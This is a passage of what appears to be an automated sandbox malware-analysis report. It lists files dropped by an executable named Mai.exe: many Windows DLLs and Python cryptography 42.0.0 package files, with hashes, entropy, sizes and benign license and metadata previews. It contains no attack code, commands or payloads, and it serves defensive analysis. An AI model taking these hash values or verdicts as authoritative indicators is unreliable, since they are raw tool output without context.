                                                          Encrypted:false
                                                          SSDEEP:192:WKtyDfIe9jWfhWyReWvcuyjS7HnhWgN7a8WhXO/h+Il+jX01k9z3AR/iXiz:WKtyDfIe9jWfhWyR7HRN7Y6EjR9zSqe
                                                          MD5:E93816C04327730D41224E7A1BA6DC51
                                                          SHA1:3F83B9FC6291146E58AFCE5B5447CD6D2F32F749
                                                          SHA-256:CA06CCF12927CA52D8827B3A36B23B6389C4C6D4706345E2D70B895B79FF2EC8
                                                          SHA-512:BEAAB5A12BFC4498CDF67D8B560EF0B0E2451C5F4634B6C5780A857666FD14F8A379F42E38BE1BEEFA1C3578B2DF913D901B271719AC6794BFAAB0731BB77BCA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12712
                                                          Entropy (8bit):6.988937791517322
                                                          Encrypted:false
                                                          SSDEEP:192:W7AaVWfhWdieWvcuyjS7HnhWgN7a8Whvrq21eX01k9z3ABfNBo3:W7AIWfhWdM7HRN7Ul8R9zmfNB0
                                                          MD5:051847E7AA7A40A1B081FF4B79410B5B
                                                          SHA1:4CA24E1DA7C5BB0F2E9F5F8CE98BE744EA38309E
                                                          SHA-256:752542F72AF04B3837939F0113BFCB99858E86698998398B6CD0E4E5C3182FD5
                                                          SHA-512:1BFB96D15DF1CD3DCEFC933AECA3CE59BEF90E4575A66EAAB92386F8E93652906626308886DD9B82C0863D1544331BBF99BE8E781FA71D8C4C1F5FFF294056DC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.826511666056111
                                                          Encrypted:false
                                                          SSDEEP:192:WLGeVxWfhWkeWvcuyjS7HnhWgN7a8WhZch+Il+jX01k9z3ARLXX:WLGeVxWfhWO7HRN7HEjR9zSLn
                                                          MD5:2AA1F0C20DFB4586B28FAF2AA16B7B00
                                                          SHA1:3C4E9C8FCA6F24891430A29B155876A41F91F937
                                                          SHA-256:D2C9EE6B1698DFE99465AF4B7358A2F4C199C907A6001110EDBEA2D71B63CD3F
                                                          SHA-512:AE05338075972E258BCF1465E444C0A267AD6F03FBB499F653D9D63422A59AC28F2CB83EC25F1181699E59ECBAAC33996883E0B998CBADE1CC011BC166D126D0
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.908697555398443
                                                          Encrypted:false
                                                          SSDEEP:192:WvyMv9WfhW0FCeWvcuyjS7HnhWgN7a8Wh/kkQOh+Il+jX01k9z3ARpXZE:WvyMv9WfhWas7HRN7x0EjR9zSppE
                                                          MD5:6E5DA9819BD53DCB55ABDE1DA67F3493
                                                          SHA1:8562859EBF3CE95F7ECB4E2C785F43AD7AAAF151
                                                          SHA-256:30DC0DEB0FAF0434732F2158AD24F2199DEF8DD04520B9DAABBC5F0B3B6DDF40
                                                          SHA-512:75EB227CA60FF8E873DAC7FA3316B476B967069E8F0AC31469B2DE5A9B21044DB004353FEBF2B53069392BE10A8BF40563BB5D6D4BE774D37D12CF6FBECED175
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15272
                                                          Entropy (8bit):6.791010772317001
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.926691835908429
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.829698799977648
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.908054226003342
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.845813488265057
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14240
                                                          Entropy (8bit):6.852755058390383
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17312
                                                          Entropy (8bit):6.653286066355999
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.828467063666851
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15272
                                                          Entropy (8bit):6.852618546365563
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.799945740819369
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.911130988876802
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22440
                                                          Entropy (8bit):6.399039136519993
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.818799641918408
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17832
                                                          Entropy (8bit):6.6533593146787045
                                                          Encrypted:false
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):19368
                                                          Entropy (8bit):6.59035476139595
                                                          Encrypted:false
                                                          SSDEEP:192:W5fgnLpHquWYFxEpahXWfhWlYeWvcuyjS7HnhWgN7a8WhZOh+Il+jX01k9z3ARXF:WEZpFVhXWfhWli7HRN7FEjR9zSXUg
                                                          MD5:844E18709C2DEDA41F2228068A8D2CED
                                                          SHA1:871BF94A33FA6BB36FA1332F8EC98D8D3E6FE3B6
                                                          SHA-256:799E9174163F5878BEA68CA9A6D05C0EDF375518E7CC6CC69300C2335F3B5EA2
                                                          SHA-512:3BBB82D79F54D85DCBE6EE85A9909C999B760A09E8925D704A13BA18C0A610A97054AC8BD4C66C1D52AB08A474EDA78542D5D79AE036F2C8E1F1E584F5122945
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):19368
                                                          Entropy (8bit):6.582111769188288
                                                          Encrypted:false
                                                          SSDEEP:384:W5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWfhWJ7HRN7yl8R9zmfNBqFn284:y6S5yguNvZ5VQgx3SbwA71IkFDSylQ9e
                                                          MD5:5A82C7858065335CAD14FB06F0465C7E
                                                          SHA1:C5804404D016F64F3F959973EAEFB7820EDC97AD
                                                          SHA-256:3BF407F8386989AA5F8C82525C400B249E6F8D946A32F28C469C996569D5B2E3
                                                          SHA-512:88A06E823F90EF32D62794DAFE6C3E92755F1F1275C8192A50E982013A56CF58A3BA39E2D80B0DD5B56986F2A7D4C5B047A75F8D8F4B5B241CDF2D00BEEBD0D5
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15784
                                                          Entropy (8bit):6.75722036011819
                                                          Encrypted:false
                                                          SSDEEP:192:WAJD2WfhWfeWvcuyjS7HnhWgN7a8WhSfdh+Il+jX01k9z3ARaXMgecI:WAcWfhWn7HRN7XfTEjR9zSacgbI
                                                          MD5:B64B9E13C90F84D0B522CD0645C2100C
                                                          SHA1:39822CB8F0914A282773E4218877168909FDC18D
                                                          SHA-256:2F6B0F89F4D680A9A9994D08AA5CD514794BE584A379487906071756AC644BD6
                                                          SHA-512:9CB03D1120DE577BDB9ED720C4EC8A0B89DB85969B74FBD900DCDC00CF85A78D9469290A5A5D39BE3691CB99D49CF6B84569AC7669A798B1E9B6C71047B350DE
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.900466904881445
                                                          Encrypted:false
                                                          SSDEEP:192:W1fHQdujWfhWmeWvcuyjS7HnhWgN7a8WhLq21eX01k9z3ABfNB13gE:W1f9WfhWg7HRN7Ql8R9zmfNB3
                                                          MD5:26F020C0E210BCE7C7428AC049A3C5DA
                                                          SHA1:7BF44874B3BA7B5BA4B20BB81D3908E4CDE2819C
                                                          SHA-256:DFAD88B5D54C597D81250B8569F6D381F7016F935742AC2138BA2A9AE514C601
                                                          SHA-512:7DA07143CAB0A26B974FA90E3692D073B2E46E39875B2DD360648382D0BFCA986338697600C4BC9FE54FC3826DAA8FC8F2FEC987DE75480354C83ABA612AFA5F
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):281617
                                                          Entropy (8bit):6.048201407322743
                                                          Encrypted:false
                                                          SSDEEP:6144:QW1H/M8fRR1mNplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5f:QWN/TR8NLWURrI55MWavdF0f
                                                          MD5:78D9DD608305A97773574D1C0FB10B61
                                                          SHA1:9E177F31A3622AD71C3D403422C9A980E563FE32
                                                          SHA-256:794D039FFDF277C047E26F2C7D58F81A5865D8A0EB7024A0FAC1164FEA4D27CF
                                                          SHA-512:0C2D08747712ED227B4992F6F8F3CC21168627A79E81C6E860EE2B5F711AF7F4387D3B71B390AA70A13661FC82806CC77AF8AB1E8A8DF82AD15E29E05FA911BF
                                                          Malicious:false
                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10752
                                                          Entropy (8bit):4.666005138902942
                                                          Encrypted:false
                                                          SSDEEP:96:KJdp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCF4ioUjQcX6g8cim1qeSju1:KJ72HzzjBbRYoe2oRcqgvimoe
                                                          MD5:28AF0FFB49CC20FE5AF9FE8EFA49D6F1
                                                          SHA1:2C17057C33382DDFFEA3CA589018CBA04C4E49D7
                                                          SHA-256:F1E26EF5D12C58D652B0B5437C355A14CD66606B2FBC00339497DD00243081E0
                                                          SHA-512:9AA99E17F20A5DD485AE43AC85842BD5270EBAB83A49E896975A8FA9F98FFC5F7585BEF84ED46BA55F40A25E224F2640E85CEBE5ACB9087CF46D178ECC8029F0
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):113152
                                                          Entropy (8bit):5.883508414366263
                                                          Encrypted:false
                                                          SSDEEP:1536:Oa+euGiytUbL3818SfqZpr0w2a5i5hBi0GmV4Ms7oTGKMl8g1d:OtezmbL38+SCZqw2aA8QV67oTGKw
                                                          MD5:6CDCA2FDE9DF198DA58955397033AF98
                                                          SHA1:E457C97721504D25F43B549D57E4538A62623168
                                                          SHA-256:A4A758EABD1B2B45F3C4699BDFEBC98F196DC691C0A3D5407E17FFFFFAFC5DF7
                                                          SHA-512:7B3C384BA9993D3192ED852191FF77BDCD3421CBC69FF636C6DEB8FE7248E066573B68D80A8F280AE0C1CB015F79967D46D910455D932EAEAC072C76D0757E92
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Mn:M
                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                          Malicious:false
                                                          Preview:pip.
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):197
                                                          Entropy (8bit):4.61968998873571
                                                          Encrypted:false
                                                          SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                          MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                          SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                          SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                          SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                          Malicious:false
                                                          Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):11360
                                                          Entropy (8bit):4.426756947907149
                                                          Encrypted:false
                                                          SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                          MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                          SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                          SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                          SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                          Malicious:false
                                                          Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1532
                                                          Entropy (8bit):5.058591167088024
                                                          Encrypted:false
                                                          SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                          MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                          SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                          SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                          SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                          Malicious:false
                                                          Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5430
                                                          Entropy (8bit):5.111666659056883
                                                          Encrypted:false
                                                          SSDEEP:96:DxepqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:QJnkoBs/stL18cT+vIrrxsM6VwDjyeyM
                                                          MD5:E41411753BDAECA2122B1A0BE1D1FB8B
                                                          SHA1:2B61382D5C0D1C397E918FBDA70EF4A1CCAB986A
                                                          SHA-256:7829C32F69C346DBFEE693D6F00892875FA102ED3A52354AE658A89E0664EA04
                                                          SHA-512:F9519A0C9273E2BA56451499FBBB9288CE1F48752A199594DF5E8109BF6C535A31F9277975D08DC7268DF41F5DC625D9C910986FEBDC81657635C6AAD846E804
                                                          Malicious:false
                                                          Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.0..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):15231
                                                          Entropy (8bit):5.557812516579126
                                                          Encrypted:false
                                                          SSDEEP:192:7X6r/nHd5jF4eeIZVhFu4KoF9vZ6FGotqw++NXwvn5tnl:7XSHfCG+onvZ6FGotqw++9wvnd
                                                          MD5:58657B407E7C404DF907823E4A0B17AF
                                                          SHA1:8BD28A940802692E98898643722D12E184280169
                                                          SHA-256:D185BB53C2C08CCC6EDA6B0B377E3CF2201C297AF23ACCD9011126D94AAAB979
                                                          SHA-512:9682D44BEB3C38B6629288A1B34F4B822F4E05AD3EFAE706E2EE3CFC3BAA68EB478E8C6D3A434EC89CF483D8FB31B7A56D4F2E73FA12F087192697F134D7F6B8
                                                          Malicious:false
                                                          Preview:cryptography-42.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.0.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.0.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.0.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.0.dist-info/METADATA,sha256=eCnDL2nDRtv-5pPW8AiSh1-hAu06UjVK5liongZk6gQ,5430..cryptography-42.0.0.dist-info/RECORD,,..cryptography-42.0.0.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.0.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=I_nLQmdqpHebVAVP95252neXIbkOrc_A0E4Bz91JEOo,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/__about__.cpython-311.pyc,,..cryptography/__pycache__/__init__.cpython-311.pyc,,..cryptography/
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):100
                                                          Entropy (8bit):5.0203365408149025
                                                          Encrypted:false
                                                          SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
                                                          MD5:C48772FF6F9F408D7160FE9537E150E0
                                                          SHA1:79D4978B413F7051C3721164812885381DE2FDF5
                                                          SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
                                                          SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
                                                          Malicious:false
                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7203328
                                                          Entropy (8bit):6.564257778736086
                                                          Encrypted:false
                                                          SSDEEP:49152:oFBK593C5Rm30IU6i/GtlqDVwASOVjSiijSd8WbVtd8kOY0PKomemakfqIkWtizi:3jb+1zd8kOywKqyme6V0QVgAAMwYdS1
                                                          MD5:F0DCDBBD5C83F7332B8AF3EADE41F7E2
                                                          SHA1:61F29A8AAE20655012F2CC5FA89CB3D96BA73149
                                                          SHA-256:C52C74AF512F18DE26E7DC8A7BF22D475DDCDAE670A16FAA85CDD53B6C9810A7
                                                          SHA-512:9D5F60BA0F981DBA3B857859DC34A4D150B0615D9A51DD574D0ECAC2D01C2831D1A74F243A77F1B5E4B3DCF67538BD350B1AFF9405C81F89E372866BA494CB30
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Mn:M
                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                          Malicious:false
                                                          Preview:pip.
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):11358
                                                          Entropy (8bit):4.4267168336581415
                                                          Encrypted:false
                                                          SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                          MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                          SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                          SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                          SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                          Malicious:false
                                                          Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4926
                                                          Entropy (8bit):5.016007756463111
                                                          Encrypted:false
                                                          SSDEEP:96:Dr8ZSaChm1nTR9GDbHR2ie7QfYpulJGc+vFZoDN00x2jZ2SBXZJSwTE:5hm9fGDbHR2iOQfyurz+D00vJHJSwTE
                                                          MD5:B0BDE2A3F0CD2C95203E4FABB5A8FEB6
                                                          SHA1:85958E584060BDF8D79B52265F93A80CE9F2EEE7
                                                          SHA-256:62FB03CC1D7DE1D50DE44D405B0708302B12F4CCD7FD216D9AE8863DCA767A67
                                                          SHA-512:03537755EB30AE048376B3E161BDAAF8DBD9D5C0968B5A10474C93854E8E4B18F3889EABBBBBA0DBA0EED238A8D165276ABE68452A6C4C8F16E9DFC6159122F3
                                                          Malicious:false
